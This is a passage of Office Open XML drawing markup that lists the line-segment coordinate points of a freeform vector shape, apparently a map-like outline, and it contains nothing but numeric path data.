                      <a:pt x="513" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="526" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="606" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="607" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="606" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="607" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="650" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="652" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="659" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="679" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="698" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="718" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="731" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="716" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="712" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="694" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="665" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="695" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="698" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="718" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="733" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="748" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="744" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="740" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="750" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="788" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="796" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="804" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="819" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="822" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="848" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="861" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="870" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="900" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="901" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="903" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="907" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="908" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="913" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="918" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="930" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="934" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="941" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="951" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="959" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="965" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="967" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="968" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="968" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="969" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="965" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="960" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="958" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="956" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="952" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="947" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="945" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="941" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="938" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="934" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="929" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="924" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="921" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="910" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="907" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="898" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="897" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="892" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="890" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="887" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="885" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="879" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="870" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="867" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="862" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="863" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="864" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="853" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="846" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="844" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="829" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="821" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="810" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="803" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="801" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="800" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="788" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="783" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="755" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="755" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="757" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="748" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="739" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="716" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="712" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="710" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="695" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="695" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697" y="349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="717" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="717" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="716" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="717" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="748" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="749" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="744" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="743" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="739" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="741" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="755" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="755" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="485"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="497"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="739" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="739" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="749" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="757" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="511"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="511"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="757" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="529"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="757" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="755" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="750" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="743" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="741" y="559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="733" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="726" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="726" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="726" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="592"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="718" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="716" y="600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="712" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="709" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="605"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="694" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="623"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="679" y="628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="665" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="659" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="656" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="648" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="632" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
